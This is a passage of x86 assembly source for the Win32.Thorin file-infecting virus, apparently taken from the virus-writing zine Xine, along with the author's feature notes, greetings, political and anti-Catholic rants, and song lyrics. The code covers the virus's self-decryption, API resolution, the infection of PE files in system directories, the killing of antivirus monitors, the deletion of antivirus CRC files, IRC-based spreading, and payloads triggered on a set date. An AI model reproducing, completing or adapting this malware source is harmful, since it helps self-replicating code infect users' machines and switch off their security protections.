|||
|
virus_end label byte
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; First generation host
|
|||
|
; ===========================================================================
|
|||
|
; I'm alone. I'm with me. I'm thinking. I'm dangerous.
|
|||
|
|
|||
|
fakehost:
|
|||
|
pop dword ptr fs:[0]
|
|||
|
pop eax
|
|||
|
popad
|
|||
|
popfd
|
|||
|
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push offset szTitle
|
|||
|
push offset szMessage
|
|||
|
push eax
|
|||
|
call MessageBoxA
|
|||
|
|
|||
|
push 00000000h
|
|||
|
call ExitProcess
|
|||
|
|
|||
|
end thorin
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Bonus Track
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; As this virus is related with Tolkien, there is also a relation with some
|
|||
|
; songs of my favourite band: Blind Guardian. And as most of you don't know
|
|||
|
; a shit about them, here i will put one song: The Bard's Song [in the fo-
|
|||
|
; rest], that is the hymn of all Blind Guardian's fans. By the way, i have to
|
|||
|
; wish them good luck, because i've heard that their vocalist had recently an
|
|||
|
; operation in his ear. Good luck, Hansi!!! We will always love you!
|
|||
|
;
|
|||
|
; Bard's Song [in the forest]
|
|||
|
; ???????????????????????????
|
|||
|
; Now you all know
|
|||
|
; The bards and their songs
|
|||
|
; When hours have gone by
|
|||
|
; I'll close my eyes
|
|||
|
; In a world far away
|
|||
|
; We may meet again
|
|||
|
; But now hear my song
|
|||
|
; About the dawn of the night
|
|||
|
; Let's sing the bards' song
|
|||
|
;
|
|||
|
; Tomorrow will take us away
|
|||
|
; Far from home
|
|||
|
; Noone will ever know our names
|
|||
|
; But the bards' song will remain
|
|||
|
; Tomorrow will take it away
|
|||
|
; The fear of today
|
|||
|
; It will be gone
|
|||
|
; Due to our magic songs
|
|||
|
;
|
|||
|
; There's only one song
|
|||
|
; Left in my mind
|
|||
|
; Tales of a brave man
|
|||
|
; Who lived far from here
|
|||
|
;
|
|||
|
; Now the bard songs are over
|
|||
|
; And it's time to leave
|
|||
|
; Noone should ask you for the name
|
|||
|
; Of the one
|
|||
|
; Who tells the story
|
|||
|
;
|
|||
|
; Tomorrow will take us away
|
|||
|
; Far from home
|
|||
|
; Noone will ever know our names
|
|||
|
; But the bards' song will remain
|
|||
|
; Tomorrow all will be known
|
|||
|
; And you are not alone
|
|||
|
; So don't be afraid
|
|||
|
; In the dark and cold
|
|||
|
; 'Cause the bards' song will remain
|
|||
|
; They all will remain
|
|||
|
;
|
|||
|
; In my thoughts and dreams
|
|||
|
; They're always in my mind
|
|||
|
; These songs from hobbits, dwarves and men
|
|||
|
; And elves
|
|||
|
; Come close your eyes
|
|||
|
; You can see them, too
|
|||
|
;
|
|||
|
; ---
|
|||
|
; Copyright (c) 1992 by Blind Guardian; "Somewhere far beyond" album.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
; Brought to you by 'The ZOO' !
|
|||
|
|
|||
|
|
|||
|
/-----------------------------\
|
|||
|
| Xine - issue #4 - Phile 204 |
|
|||
|
\-----------------------------/
|
|||
|
|
|||
|
; [Win32.Thorin] - PE/mIRC/PIRCH/ViRC97/resident/semi-stealth/poly/RDA, etc.
|
|||
|
; Copyright (c) 1999 by Billy Belcebu/iKX
|
|||
|
;
|
|||
|
; ??<3F> ??<3F> ??<3F> ???<3F> ??<3F> ??????<3F> ??????<3F>
|
|||
|
; ??? ??? ??? ????<3F> ??? ???????<3F> ???????<3F>
|
|||
|
; ??? ?<3F> ??? ??? ?????<3F> ??? ??????? ???????
|
|||
|
; ??????<3F>??? ??? ??????<3F>??? ??????<3F> ???????
|
|||
|
; ?????????? ??? ??? ?????? ???????? ???????<3F> ??<3F>
|
|||
|
; ???????? ??? ??? ????? ??????? ???????? ???
|
|||
|
; ????????<3F> ??<3F> ??<3F> ??????<3F> ??????<3F> ??<3F> ???<3F> ??<3F>
|
|||
|
; ????????? ??? ??? ????????<3F> ???????<3F> ??? ????<3F> ???
|
|||
|
; ??? ???????? ??? ??? ???????? ??? ?????<3F> ???
|
|||
|
; ??? ???????? ??? ??? ???????<3F> ??? ??????<3F>???
|
|||
|
; ??? ??? ??? ????????? ??? ??? ??? ??? ??????
|
|||
|
; ??? ??? ??? ??????? ??? ??? ??? ??? ?????
|
|||
|
;
|
|||
|
; Virus Name : Thorin.11932 [ Bugfix version ]
|
|||
|
; Virus Author : Billy Belcebu/iKX
|
|||
|
; Origin : Spain
|
|||
|
; Platform : Win32
|
|||
|
; Target : PE files (EXE/SCR/CPL) & mIRC/PIRCH/ViRC97 spreading
|
|||
|
; Poly : THME 1.0 [The Hobbit Mutation Engine]
|
|||
|
; Unpack : LSCE 1.0 [Little Shitty Compression Engine]
|
|||
|
; Compiling : TASM 5.0 and TLINK 5.0 should be used
|
|||
|
; tasm32 /ml /m3 thorin,,;
|
|||
|
; tlink32 /Tpe /aa /c /v thorin,thorin,,import32.lib,
|
|||
|
; pewrsec thorin.exe
|
|||
|
; Why 'Thorin'? : Heh, are you an incult guy? Heh, have you ever read the
|
|||
|
; wonderful book of the wonderful author J. R. R. Tolkien,
|
|||
|
; called "The Hobbit"? Ok, if you did it, you can realize
|
|||
|
; that the most important dwarf is called in this way :) He
|
|||
|
; died with honour, and he couldn't taste the victory and be
|
|||
|
; the king, anyway thanks to him, the Middle-Earth was a much
|
|||
|
; better world for years. Ain't it charming? ;)
|
|||
|
; Features : Ok, here i will list all that this babe is able to do...
|
|||
|
; ? Infect PE files in current, Windows, and System dirs.
|
|||
|
; ? Runtime module, infects 4 files each time.
|
|||
|
; ? Per-Process residency (Import Table & GetProcAddress).
|
|||
|
; ? Infects EXE, SCR & CPL files.
|
|||
|
; ? Anti-Debugging features (SEH & 'IsDebuggerPresent').
|
|||
|
; ? Anti-Emulation features.
|
|||
|
; ? Anti-Monitors, kills AVP Monitor and AMON.
|
|||
|
; ? Polymorphic layer of decryption.
|
|||
|
; ? RDA layer of decryption.
|
|||
|
; ? Size Stealth (FindFirstFileA/FindNextFileA).
|
|||
|
; ? Fast infection (depending of the host).
|
|||
|
; ? Internet aware virus: mIRC, ViRC97 and PIRCH scripts.
|
|||
|
; ? Traversal routine for search for the scripts (hi LJ!).
|
|||
|
; ? Packed dropper, used LSCE 1.0.
|
|||
|
; ? Really tiny unpacker.
|
|||
|
; ? Multiple payloads (see below).
|
|||
|
; ? Doesn't hardcode KERNEL32 base address.
|
|||
|
; ? Doesn't hardcode API addresses (of course).
|
|||
|
; ? Gets Image Base at running time.
|
|||
|
; ? Removes many AV CRC files.
|
|||
|
; ? Avoids infection of certain (dangerous for us) files.
|
|||
|
; Payloads : Yes, this virus has multiple payloads (hi DuST!). Let's see
|
|||
|
; a little overview of them (executed every 26 of October).
|
|||
|
; 1. The biggest one, based in a trick that i learnt from
|
|||
|
; mandragore's viruses, dropping a file as C:\WIN.COM, that
|
|||
|
; gets executed by the system before of the file that should
|
|||
|
; be, that is C:\WINDOWS\WIN.COM, thus bringing us the possi-
|
|||
|
; bility of own the computer before windows :) Well, it cons-
|
|||
|
; ists in a very little, simple and easy quiz that all ppl
|
|||
|
; who had read "The Hobbit" once in his life would be able to
|
|||
|
; pass without problems, and consists of 3 questions.
|
|||
|
; 2. Sets the HD's name as 'THORIN'.
|
|||
|
; 3. Due an idea that my friend Qozah gave me, it swaps the
|
|||
|
; mouse buttons, thus making the user be stoned... All you
|
|||
|
; clicked with the left button, now you'll have to click with
|
|||
|
; the right one, and vice-versa.
|
|||
|
; 4. The typical MessageBox with a silly message.
|
|||
|
; 5. Launches user to Microsoft page, thus annoying him and
|
|||
|
; make his little and ignorant mind to think that the awaited
|
|||
|
; Micro$oft offensive over the earth has began. Well, ain't
|
|||
|
; this one charming? ;)
|
|||
|
; Internet : This virus is able to spread itself using the most used
|
|||
|
; IRC programs over the world: mIRC, PIRCH and ViRC. Every
|
|||
|
; infected system will have a little infected file in
|
|||
|
; C:\PR0N.EXE. This file is sent to everyone that joins the
|
|||
|
; channel where the user is chatting by DCC. Very simple and
|
|||
|
; effective.
|
|||
|
; Greetings : This virus is dedicated to many people... Firstly, to the
|
|||
|
; iKX crew for trust in me, to the DDT past,present and futu-
|
|||
|
; re crew for the friendship during the time, 29A ppl, FS ppl
|
|||
|
; etc. Now, the personal greetings (w/ no particular order):
|
|||
|
;
|
|||
|
; SeptiC - Your 'Internet aware viruses' article rules!!!
|
|||
|
; b0z0 - Hi, my favourite 'little' clown :)
|
|||
|
; StarZer0 - no. no, no. no sex.
|
|||
|
; Int13h - I'd like you come to Spain :)
|
|||
|
; Murkry - I'm glad to be in a group with this genius.
|
|||
|
; n0ph - I still don't have the pleasure of knowin' you...
|
|||
|
; Somniun - Si tienes alguna duda de Win32, pregunta!! ;)
|
|||
|
; Wintermute - RAMMSTEIN rules! You always have reason ;)
|
|||
|
; Owl - You are very isolated from the world, pal :)
|
|||
|
; Vecna - The best coder of everytime.
|
|||
|
; Ypsilon - Nos vemos en septiembre! :)
|
|||
|
; Bumblebee - Pues eso, a ver si tu vienes tambien...
|
|||
|
; TechnoPhunk - Forget catholicism and be nihilist! ;)
|
|||
|
; Qozah - I'd like to do a cooperation project with ya ;)
|
|||
|
; Benny - Same with you :) Yer a reely impressive codah!
|
|||
|
; Super - ?Como te va en Castellon?
|
|||
|
; nIgr0 - Code viruses, not 'legal' thingies!
|
|||
|
; MDriller - best p0lys without any kinda discussion...
|
|||
|
; T-2000 - I share ur ideas 'bout religion: radical but true
|
|||
|
; SlageHammer - I loved yer city! Milano rocks! Padania rocks!
|
|||
|
; VirusBuster - I've seen "Love Struck Baby" video. SRV rlz ;)
|
|||
|
; LordJulus - Keep on coding, but optimize more! ;)
|
|||
|
;
|
|||
|
; Also dedicated to all the Bards around!
|
|||
|
;
|
|||
|
; Thoughts : This is, nowadays, my best virus so far, over Iced Earth,
|
|||
|
; Garaipena, and Nitro, all of them for Windoze. I needed to
|
|||
|
; do at least a good virus, for feed my own ego (why lie?),
|
|||
|
; and i think this is what really happened. But i won't stop
|
|||
|
; there, there are many things yet to explore (and exploit)
|
|||
|
; in 32 bit enviroments, there are many problems unsolved,
|
|||
|
; and i will try to contribute with my humble code for all
|
|||
|
; those purposes. Btw, i used, in my other viruses, to try to
|
|||
|
; optimize , but in this virus i didn't. I mean, you won't
|
|||
|
; see here OBVIOUS lacks of optimization, like CMP reg,-1 but
|
|||
|
; i will use many times the same code in different procedures
|
|||
|
; many strings, two droppers (one for IRC distribution, and
|
|||
|
; other for one payload). This virus is big in its size, well
|
|||
|
; not as Win32.Harrier, Win32.Libertine, WinNT.Remex, etc.,
|
|||
|
; but it's a 'big' one, and i hope this will mean a 'good'
|
|||
|
; one. Fuck, i've coded also a lot of payloads, none of them
|
|||
|
; is destructive, but all are VERY annoying... The descripti-
|
|||
|
; on is above, if you don't believe me.
|
|||
|
; Well, now i'm gonna excuse myself, because while making
|
|||
|
; this virus (based initially on my Win95.Iced Earth) i have
|
|||
|
; noticed the great quantity of bugs that my Iced Earth virus
|
|||
|
; had (believe me, more than 10 incredible bugs!), and i'm
|
|||
|
; still wondering why all those escaped from my beta testing.
|
|||
|
; Moreover, all those bugs only reflect my incompetence. With
|
|||
|
; this virus i have made very serious tests, mainly because
|
|||
|
; some delicated parts of the virus needed it to work perfec-
|
|||
|
; ly (i.e. per-process residence). Maybe there will be also
|
|||
|
; bugs, but now at least i know there are less :)
|
|||
|
; My next steps will be the research in the fields of MMX
|
|||
|
; polymorphism, some metamorphism, and i hope that my next
|
|||
|
; virus will use EPO techniques, because i haven't experimen-
|
|||
|
; ted yet with such a kewl thing.
|
|||
|
; Politics : Benny doesn't like that i use to talk about politics, but i
|
|||
|
; have put it there just for explain some things that could
|
|||
|
; guide you to misunderstand my way of act. Everybody knows
|
|||
|
; that i tend to Marxism, right? Well, but i'm not saying
|
|||
|
; with this that i support Fidel Castro, Mao, and such like
|
|||
|
; pseudo-communists (that tend to totalitarism). I think that
|
|||
|
; everybody must have the same oportunities, and without any
|
|||
|
; kind of discrimination. But as i am not a guy with an only
|
|||
|
; idea, i support also (if there isn't any other choice) the
|
|||
|
; democracy, but i prefer it to be a democracy as participa-
|
|||
|
; tion and not as a procediment. Whom has studied some philo-
|
|||
|
; sophy will know of what i am talking about: avoid the fi-
|
|||
|
; erce and discriminatory capitalism. As i am tolerant, you
|
|||
|
; can be againist my ideas, and i will accept it. So Benny,
|
|||
|
; i'm not a totalitarian asshole, just the opposite, i'm just
|
|||
|
; a young idealist :) Be free, enjoy life...
|
|||
|
; Final note : Although it screwed me a lot, i haven't put data in the
|
|||
|
; heap as i used to do because this virus is too big and the
|
|||
|
; data used temporally is also too big, and it generated some
|
|||
|
; protection faults... SHIT!!!!
|
|||
|
;
|
|||
|
; That is not dead
|
|||
|
; which can eternal lie
|
|||
|
; yet with strange aeons
|
|||
|
; even death may die
|
|||
|
;
|
|||
|
; -H. P. Lovecraft-
|
|||
|
;
|
|||
|
; (c) 1999 Billy Belcebu/iKX
|
|||
|
|
|||
|
.586p
|
|||
|
.model flat
|
|||
|
.data
|
|||
|
|
|||
|
; 1st gen exported apis
|
|||
|
|
|||
|
extrn MessageBoxA:PROC
|
|||
|
extrn ExitProcess:PROC
|
|||
|
|
|||
|
; Some useful equates
|
|||
|
|
|||
|
virus_size equ (offset virus_end-offset virus_start)
|
|||
|
poly_virus_size equ (offset crypt_end-offset thorin)
|
|||
|
shit_b4_delta equ (offset delta-offset virus_start)
|
|||
|
encrypt_size equ (crypt_end-crypto)
|
|||
|
non_crypt_size equ (virus_size-encrypt_size-rda_decryptor)
|
|||
|
rda_decryptor equ (virus_end-crypt_end)
|
|||
|
section_flags equ 00000020h or 20000000h or 80000000h
|
|||
|
directory_attr equ 00000010h
|
|||
|
temp_attributes equ 00000080h
|
|||
|
drop_old_size equ 00011000d
|
|||
|
n_Handles equ 50d
|
|||
|
WFD_HndSize equ n_Handles*8
|
|||
|
|
|||
|
n_infections equ 04h
|
|||
|
bad_number equ 09h
|
|||
|
|
|||
|
orig_size equ 044h
|
|||
|
mark equ 04Ch
|
|||
|
ddInfMark equ "NRHT"
|
|||
|
|
|||
|
kernel_ equ 0BFF70000h ; Only used if the K32 search
|
|||
|
kernel_wNT equ 077F00000h ; fails...
|
|||
|
|
|||
|
imagebase_ equ 000400000h ; y0h0h0
|
|||
|
|
|||
|
; Interesting macros for my code
|
|||
|
|
|||
|
cmp_ macro reg,joff1 ; Optimized version of
|
|||
|
inc reg ; CMP reg,0FFFFFFFFh
|
|||
|
jz joff1 ; JZ joff1
|
|||
|
dec reg ; The code is reduced in 3
|
|||
|
endm ; bytes (7-4)
|
|||
|
|
|||
|
cmpz macro reg,joff2 ; Optimized version of
|
|||
|
xchg reg,ecx ; CMP reg,00h
|
|||
|
jecxz joff2 ; JZ joff2
|
|||
|
endm ; Code reduced in 2 bytes
|
|||
|
|
|||
|
cmpz_ macro reg,joff3 ; Blah
|
|||
|
or reg,reg
|
|||
|
jz joff3
|
|||
|
endm
|
|||
|
|
|||
|
apicall macro apioff ; Optimize muthafucka!
|
|||
|
call dword ptr [ebp+apioff]
|
|||
|
endm
|
|||
|
|
|||
|
rva2va macro reg,base ; Only for make preetiest the
|
|||
|
add reg,[ebp+base] ; code ;)
|
|||
|
endm
|
|||
|
|
|||
|
virussize macro
|
|||
|
db virus_size/10000 mod 10 + "0"
|
|||
|
db virus_size/01000 mod 10 + "0"
|
|||
|
db virus_size/00100 mod 10 + "0"
|
|||
|
db virus_size/00010 mod 10 + "0"
|
|||
|
db virus_size/00001 mod 10 + "0"
|
|||
|
endm
|
|||
|
|
|||
|
; Some shitty thingies in data section... 1st gen host messages
|
|||
|
|
|||
|
.data
|
|||
|
|
|||
|
szTitle db "[Win32.Thorin]",0
|
|||
|
szMessage db "First Generation Sample",10
|
|||
|
db "Virus Size : "
|
|||
|
virussize
|
|||
|
db " bytes"
|
|||
|
db 10
|
|||
|
db "Copyright (c) 1999 by Billy Belcebu/iKX",0
|
|||
|
|
|||
|
; El ke mucho llora es porke no mama!
|
|||
|
|
|||
|
.code
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Virus code
|
|||
|
; ===========================================================================
|
|||
|
; DU HAST MICH!!!
|
|||
|
|
|||
|
virus_start label byte
|
|||
|
|
|||
|
poly_layer db LIMIT dup (90h) ; Space for poly-decryptor
|
|||
|
|
|||
|
thorin:
|
|||
|
pushad ; Push all da shit
|
|||
|
pushfd
|
|||
|
|
|||
|
fwait ; Reset coprocessor
|
|||
|
fninit
|
|||
|
|
|||
|
call kill_av ; Anti-emulation trick
|
|||
|
|
|||
|
mov esp,[esp+08h]
|
|||
|
xor edx,edx
|
|||
|
pop dword ptr fs:[edx]
|
|||
|
pop edx
|
|||
|
jmp over_trap
|
|||
|
|
|||
|
kill_av:
|
|||
|
xor edx,edx
|
|||
|
push dword ptr fs:[edx]
|
|||
|
mov fs:[edx],esp
|
|||
|
dec byte ptr [edx]
|
|||
|
jmp over_rda
|
|||
|
|
|||
|
over_trap:
|
|||
|
call delta ; Hardest code to undestand ;)
|
|||
|
delta: pop ebp
|
|||
|
mov eax,ebp
|
|||
|
sub ebp,offset delta
|
|||
|
|
|||
|
sub eax,shit_b4_delta
|
|||
|
sub eax,00001000h
|
|||
|
NewEIP equ $-4
|
|||
|
|
|||
|
push eax ; Save it
|
|||
|
or ebp,ebp ; Goddamn first gen...
|
|||
|
jz over_rda
|
|||
|
call rda_crypt
|
|||
|
jmp over_rda
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; RDA Layer (Random Decryption Algorithm)
|
|||
|
; ===========================================================================
|
|||
|
; I have become a direct. I have become insurgent.
|
|||
|
|
|||
|
rda_crypt proc
|
|||
|
xor ebx,ebx ; Clear counter
|
|||
|
try_another_key:
|
|||
|
call crypt ; Try to decrypt it
|
|||
|
push ebx ; Save counter
|
|||
|
lea esi,[ebp+crypto] ; Load address to crypt
|
|||
|
mov edi,encrypt_size ; Size to crypt
|
|||
|
call CRC32 ; Get its CRC32
|
|||
|
pop ebx ; Restore counter
|
|||
|
cmp eax,12345678h ; Actual CRC32=CRC32 unencrypted?
|
|||
|
CRC equ $-4
|
|||
|
jz rda_done ; Yeah, then we decrypted it
|
|||
|
call crypt ; Nopes, fix it
|
|||
|
inc ebx ; increase key
|
|||
|
jmp try_another_key ; Try with another key
|
|||
|
rda_done:
|
|||
|
ret
|
|||
|
rda_crypt endp
|
|||
|
|
|||
|
crypt proc ; This procedures simplifies
|
|||
|
lea edi,[ebp+crypto] ; the task (and optimizes) of
|
|||
|
mov ecx,encrypt_size ; encrypt with a determinated
|
|||
|
rda_: xor byte ptr [edi],bl ; key
|
|||
|
inc edi
|
|||
|
loop rda_
|
|||
|
ret
|
|||
|
crypt endp
|
|||
|
|
|||
|
; Legalizar consimizion, no te konviene... se akaba el filon!
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; CRC32 calculator [by Vecna]
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ESI = Offset where code to calculate begins
|
|||
|
; EDI = Size of that code
|
|||
|
; output:
|
|||
|
; EAX = CRC32 of given code
|
|||
|
;
|
|||
|
|
|||
|
CRC32 proc
|
|||
|
cld
|
|||
|
push ebx
|
|||
|
xor ecx,ecx ; Optimized by me - 2 bytes
|
|||
|
dec ecx ; less
|
|||
|
mov edx,ecx
|
|||
|
NextByteCRC:
|
|||
|
xor eax,eax
|
|||
|
xor ebx,ebx
|
|||
|
lodsb
|
|||
|
xor al,cl
|
|||
|
mov cl,ch
|
|||
|
mov ch,dl
|
|||
|
mov dl,dh
|
|||
|
mov dh,8
|
|||
|
NextBitCRC:
|
|||
|
shr bx,1
|
|||
|
rcr ax,1
|
|||
|
jnc NoCRC
|
|||
|
xor ax,08320h
|
|||
|
xor bx,0EDB8h
|
|||
|
NoCRC: dec dh
|
|||
|
jnz NextBitCRC
|
|||
|
xor ecx,eax
|
|||
|
xor edx,ebx
|
|||
|
dec edi ; Another fool byte less
|
|||
|
jnz NextByteCRC
|
|||
|
not edx
|
|||
|
not ecx
|
|||
|
pop ebx
|
|||
|
mov eax,edx
|
|||
|
rol eax,16
|
|||
|
mov ax,cx
|
|||
|
ret
|
|||
|
CRC32 endp
|
|||
|
|
|||
|
crypto equ $
|
|||
|
|
|||
|
db " [IAIDA] " ; Little message to the pree-
|
|||
|
; tiest girl over the earth.
|
|||
|
; She deserves much more, i
|
|||
|
; know... anyway... she's here!
|
|||
|
|
|||
|
; No penseis ke soy baboso, ein?!?!?!?!?!? :)
|
|||
|
|
|||
|
over_rda:
|
|||
|
pop eax
|
|||
|
mov dword ptr [ebp+ModBase],eax ; EAX = Image Base of module
|
|||
|
|
|||
|
|
|||
|
call ChangeSEH ; SEH rlz.
|
|||
|
mov esp,[esp+08h] ; Restore stack
|
|||
|
jmp RestoreSEH
|
|||
|
ChangeSEH:
|
|||
|
xor ebx,ebx ; Joder, no joderemos...
|
|||
|
push dword ptr fs:[ebx] ; pero <20>JODER! las ganas ke
|
|||
|
mov fs:[ebx],esp ; tenemos :)
|
|||
|
|
|||
|
and byte ptr [ebp+inNT],00h ; Make zero inNT variable
|
|||
|
|
|||
|
mov ecx,cs ; Check if we are under WinNT
|
|||
|
xor cl,cl
|
|||
|
jecxz WinNT ; ECX = 0 - WinNT;100 - Win9X
|
|||
|
jmp shock
|
|||
|
|
|||
|
WinNT:
|
|||
|
inc byte ptr [ebp+inNT] ; If NT, mark this
|
|||
|
shock:
|
|||
|
mov esi,[esp+2Ch] ; Get program return address
|
|||
|
mov ecx,05d ; Max level
|
|||
|
call GetK32
|
|||
|
|
|||
|
; I hate the catholicism... I HATE THE CATHOLICISM!!!! STOP HIPOCRISY!!!!!!!!
|
|||
|
; STOP THOSE GODDAMN LIES!!! What is that? God helps us? Hahahahah!!! So, you
|
|||
|
; stupid catholic asshole... why there are wars, genocides, etc? Why we, the
|
|||
|
; human race, are as cruel with other humans, the nature, and everything that
|
|||
|
; goes againist our own process to earn money? Open your eyes... i won't make
|
|||
|
; you change using the power... just change yourself... it's your choice.
|
|||
|
|
|||
|
asakopako:
|
|||
|
mov dword ptr [ebp+kernel],eax ; EAX must be K32 base address
|
|||
|
|
|||
|
; This is the main branch of the virus
|
|||
|
|
|||
|
lea edi,[ebp+@@Offsetz]
|
|||
|
lea esi,[ebp+@@Namez]
|
|||
|
call GetAPIs ; Retrieve all APIs
|
|||
|
|
|||
|
call AntiDebugger ; Antidebug their arse
|
|||
|
|
|||
|
call PrepareInfection ; Set-up infection
|
|||
|
|
|||
|
call KillMonitors ; Kill AV monitors
|
|||
|
|
|||
|
call InfectItAll ; Infect dirs
|
|||
|
|
|||
|
call DropPR0N ; Unpack and drop PR0N.EXE
|
|||
|
|
|||
|
call TraversalSearch ; Search for scripts and dr0p
|
|||
|
|
|||
|
call HookAllAPIs ; Hook IT APIs
|
|||
|
|
|||
|
; Ok, we prepare to end the adventure...
|
|||
|
|
|||
|
push WFD_HndSize ; Hook some mem for WFD_Handles
|
|||
|
push 00000000h ; structure
|
|||
|
apicall _GlobalAlloc
|
|||
|
mov dword ptr [ebp+WFD_HndInMem],eax
|
|||
|
|
|||
|
; Activate payload every 26th of October, a magical day.
|
|||
|
|
|||
|
lea eax,[ebp+SYSTEMTIME]
|
|||
|
push eax
|
|||
|
apicall _GetSystemTime
|
|||
|
|
|||
|
cmp word ptr [ebp+ST_wDay],31d
|
|||
|
jnz continue_payload
|
|||
|
jmp delete_key
|
|||
|
|
|||
|
continue_payload:
|
|||
|
cmp word ptr [ebp+ST_wDay],26d
|
|||
|
jnz no_payload
|
|||
|
|
|||
|
cmp word ptr [ebp+ST_wMonth],10d
|
|||
|
jnz no_payload
|
|||
|
|
|||
|
call payload ; Well... payloads :)
|
|||
|
|
|||
|
no_payload:
|
|||
|
xchg ebp,ecx ; 1st gen shit
|
|||
|
jecxz fakehost_
|
|||
|
|
|||
|
RestoreSEH:
|
|||
|
xor ebx,ebx ; Restore old SEH handler
|
|||
|
pop dword ptr fs:[ebx]
|
|||
|
pop eax
|
|||
|
|
|||
|
popfd ; Restore registers & flags
|
|||
|
popad
|
|||
|
|
|||
|
mov ebx,12345678h ; Here goes program's EIP
|
|||
|
org $-4
|
|||
|
OldEIP dd 00001000h
|
|||
|
|
|||
|
add ebx,12345678h ; And here its base address
|
|||
|
org $-4
|
|||
|
ModBase dd imagebase_
|
|||
|
|
|||
|
push ebx ; We return control to host
|
|||
|
ret
|
|||
|
|
|||
|
fakehost_:
|
|||
|
jmp fakehost ; 1st gen shitz0r
|
|||
|
|
|||
|
; CATHOLICISM = FASCISM = SHIT
|
|||
|
|
|||
|
delete_key: ; This gets executed once
|
|||
|
lea esi,[ebp+key_mIRC] ; each 2 months :)
|
|||
|
call DelReg
|
|||
|
lea esi,[ebp+key_PIRCH]
|
|||
|
call DelReg
|
|||
|
lea esi,[ebp+key_ViRC97]
|
|||
|
call DelReg
|
|||
|
jmp no_payload
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Most important virus info :)
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
vname label byte
|
|||
|
db "[Win32.Thorin."
|
|||
|
virussize
|
|||
|
db " v1.00]",00h
|
|||
|
copyr db "Copyright (c) 1999 by Billy Belcebu/iKX",0
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Obtain useful info that will be used in infection process
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
PrepareInfection:
|
|||
|
lea edi,[ebp+WindowsDir] ; Pointer to the variable
|
|||
|
push 7Fh ; Size of dir variable
|
|||
|
push edi ; Push it!
|
|||
|
apicall _GetWindowsDirectoryA
|
|||
|
|
|||
|
add edi,7Fh ; Pointer to the variable
|
|||
|
push 7Fh ; Size of dir variable
|
|||
|
push edi ; Push it!
|
|||
|
apicall _GetSystemDirectoryA
|
|||
|
|
|||
|
add edi,7Fh ; Pointer to the variable
|
|||
|
push edi ; Size of dir variable
|
|||
|
push 7Fh ; Push it!
|
|||
|
apicall _GetCurrentDirectoryA
|
|||
|
|
|||
|
lea eax,[ebp+szUSER32] ; Get all needed APIs from
|
|||
|
push eax ; the USER32.DLL library
|
|||
|
apicall _LoadLibraryA
|
|||
|
|
|||
|
xchg eax,ebx
|
|||
|
|
|||
|
lea edi,[ebp+@@USER32_APIs] ; Pointer to API strings
|
|||
|
lea esi,[ebp+@@USER32_Addresses] ; Pointer to API addresses
|
|||
|
retrieve_user32_apis:
|
|||
|
push edi ; Push pointer to string
|
|||
|
push ebx ; Push USER32 base address
|
|||
|
apicall _GetProcAddress
|
|||
|
|
|||
|
xchg edi,esi ; Store the address
|
|||
|
stosd
|
|||
|
xchg edi,esi
|
|||
|
|
|||
|
xor al,al ; Get the end of string
|
|||
|
scasb
|
|||
|
jnz $-1
|
|||
|
|
|||
|
cmp byte ptr [edi],"" ; I like girls...
|
|||
|
jz all_user32_apis ; Is last api?
|
|||
|
jmp retrieve_user32_apis
|
|||
|
|
|||
|
all_user32_apis:
|
|||
|
lea eax,[ebp+szADVAPI32] ; Here we will get all needed
|
|||
|
push eax ; APIs from ADVAPI32.DLL
|
|||
|
apicall _LoadLibraryA
|
|||
|
xchg eax,ebx
|
|||
|
|
|||
|
lea edi,[ebp+@@ADVAPI32_APIs] ; Pointer to API names
|
|||
|
lea esi,[ebp+@@ADVAPI32_Addresses] ; Pointer to API addresses
|
|||
|
retrieve_advapi32_apis:
|
|||
|
push edi ; Push pointer to name
|
|||
|
push ebx ; Push ADVAPI32 base address
|
|||
|
apicall _GetProcAddress
|
|||
|
|
|||
|
xchg edi,esi ; Store API address
|
|||
|
stosd
|
|||
|
xchg edi,esi
|
|||
|
|
|||
|
xor al,al ; Get the end of API string
|
|||
|
scasb
|
|||
|
jnz $-1
|
|||
|
|
|||
|
cmp byte ptr [edi],"" ; I like music [:)~
|
|||
|
jz all_advapi32_apis
|
|||
|
jmp retrieve_advapi32_apis
|
|||
|
|
|||
|
all_advapi32_apis:
|
|||
|
ret
|
|||
|
|
|||
|
; Heh, a greeting to the man (and the book!) that inspired this virus :)
|
|||
|
|
|||
|
db 0,"[The Hobbit (c) 1937 by J.R.R. Tolkien]",0
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Infect current, Windows and System directories
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
InfectItAll:
|
|||
|
lea edi,[ebp+directories] ; Pointer to 1st directory
|
|||
|
mov byte ptr [ebp+mirrormirror],dirs2inf ; Set up variable
|
|||
|
requiem:
|
|||
|
push edi ; Set as current dir the
|
|||
|
apicall _SetCurrentDirectoryA ; dir to infect
|
|||
|
|
|||
|
call DeleteShit ; Delete AV CRC files
|
|||
|
|
|||
|
push edi
|
|||
|
|
|||
|
; Initialize this values for each directory processed
|
|||
|
|
|||
|
and byte ptr [ebp+CurrentExt],00h
|
|||
|
lea esi,[ebp+EXTENSIONS]
|
|||
|
lea edi,[ebp+EXTENSION]
|
|||
|
|
|||
|
infect_all_masks:
|
|||
|
cmp byte ptr [ebp+CurrentExt],n_EXT
|
|||
|
jae all_mask_infected
|
|||
|
|
|||
|
lodsd ; EAX = EXTENSION
|
|||
|
mov [edi],eax ; No STOSD! We don't want EDI
|
|||
|
; to change...
|
|||
|
|
|||
|
push edi esi
|
|||
|
call Infect ; Infect some files
|
|||
|
pop esi edi
|
|||
|
|
|||
|
inc byte ptr [ebp+CurrentExt]
|
|||
|
jmp infect_all_masks
|
|||
|
all_mask_infected:
|
|||
|
pop edi
|
|||
|
|
|||
|
add edi,7Fh ; Get another directory
|
|||
|
|
|||
|
dec byte ptr [ebp+mirrormirror] ; Check if we infected all
|
|||
|
